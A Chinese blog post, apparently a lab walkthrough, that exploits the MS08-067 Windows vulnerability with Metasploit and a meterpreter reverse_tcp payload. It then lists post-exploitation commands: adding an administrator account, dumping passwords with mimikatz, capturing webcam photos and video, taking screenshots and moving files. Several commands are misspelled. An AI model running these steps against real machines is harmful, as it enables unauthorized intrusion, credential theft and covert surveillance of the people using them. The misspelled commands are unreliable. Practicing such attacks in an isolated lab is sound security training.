zoukankan      html  css  js  c++  java
  • ms08-067漏洞

    ms08-067漏洞攻击

    实验过程

    • 1.通过命令: ipconfigifconfig 确认攻击机和靶机在同一网段
    • 2.通过ping命令确认靶机存活。
      如图
    • 3.通过命令: msfconsole启用msf。
    • 4.攻击。
      • 1.搜索漏洞,命令: search ms08-067
      • 2.设置攻击机地址,命令:set lhost ip地址
      • 3.设置攻击机端口,命令:set lport 端口号
      • 4.设置靶机地址,命令:set rhost ip地址
      • 5.加载攻击载荷,命令:set payload windows/meterpreter/reverse_tcp
      • 6.进行攻击:exploit/run
    • 5.获得靶机权限。
    • 6.后渗透利用
      • 1.查看权限 命令:gituid
      • 2.进入shell
      • 3.添加用户账号 命令:net 用户名 密码 /add
      • 4.提权:net localgroup administrators 用户名 /add
      • 5.远程登录 命令:rdesktop IP
      • 6.查看无操作时间 命令:idletime
      • 7.获取账户密码 命令:

        meterpreter> load mimikatz
        meterpreter> msv
        meterpreter> wdigest

      • 8.查看网络摄像头列表 命令:wencam_list
      • 9.拍照 命令:wencam_snap
      • 10.抓取视频 命令:wencam_stream
      • 11.下载文件 命令:download path/filenam path
      • 12.上传文件 命令:upload path/filename path/filename
      • 13.远程登录 命令:rdesktop 靶机ip 必须开启3389服务
      • 14.截屏 :

        # load espia
        # screenshot

  • 相关阅读:
    面经补充
    一些杂项
    leetcode整理
    缓存问题及相关解决策略
    4.10 面经补充
    合并区间(二维数组与列表的转换)
    1.4任务
    jvm虚拟机笔记<八> 线程安全与锁优化
    jvm虚拟机笔记<七> 内存模型与线程
    jvm虚拟机笔记<六> 运行期优化
  • 原文地址:https://www.cnblogs.com/Mrwuhuai/p/12164280.html
Copyright © 2011-2022 走看看